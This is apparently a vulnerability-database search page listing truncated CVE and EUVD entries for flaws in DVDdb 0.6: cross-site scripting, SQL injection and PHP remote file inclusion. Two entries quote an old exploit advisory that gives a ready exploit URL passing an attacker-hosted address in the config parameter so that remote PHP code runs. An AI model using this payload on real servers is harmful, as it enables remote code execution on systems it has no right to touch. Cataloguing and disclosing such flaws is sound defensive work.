7 matches found
EUVD-2007-2492
Malware in sbrugna...
Cross site scripting
Multiple cross-site scripting XSS vulnerabilities in DVDdb 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the movieid parameter to loan.php or 2 the s parameter to listmovies.php...
CVE-2007-2499
Multiple cross-site scripting XSS vulnerabilities in DVDdb 0.6 and earlier allow remote attackers to inject arbitrary web script or HTML via 1 the movieid parameter to loan.php or 2 the s parameter to listmovies.php...
CVE-2007-0794
CVE-2007-0794 describes a SQL injection vulnerability in GlobalMegaCorp dvddb 0.6, specifically in inc/common.php via the user parameter, potentially allowing remote arbitrary SQL execution. Some sources note the issue is disputed and that the file may contain only function definitions. Connected...
CVE-2007-0793
CVE-2007-0793 describes a PHP remote file inclusion vulnerability in inc/common.php of GlobalMegaCorp dvddb 0.6, allowing remote attackers to execute arbitrary PHP code via a URL supplied in the config parameter. The affected component is the dvddb app’s common.php handling of config paths; root ...
dvddb06-rfi.txt
Title : dvddb-0.6 media remote file include vuln. Author : Blaster Download : http://globalmegacorp.org/dvddb/dvddb-0.6.zip Contact : [email protected] Vuln Code: require$config /"themes"; ExpLoit : http://target/path/inc/common.php?config=attacker GreetZ: BLaCKWHITE, HackerBox.Eu...
dvddb-0.6 media remote file include vuln.
Title : dvddb-0.6 media remote file include vuln. Author : Blaster Download : http://globalmegacorp.org/dvddb/dvddb-0.6.zip Contact : [email protected] Vuln Code: require$config /"themes"; ExpLoit : http://target/path/inc/common.php?config=attacker GreetZ: BLaCKWHITE, HackerBox.Eu...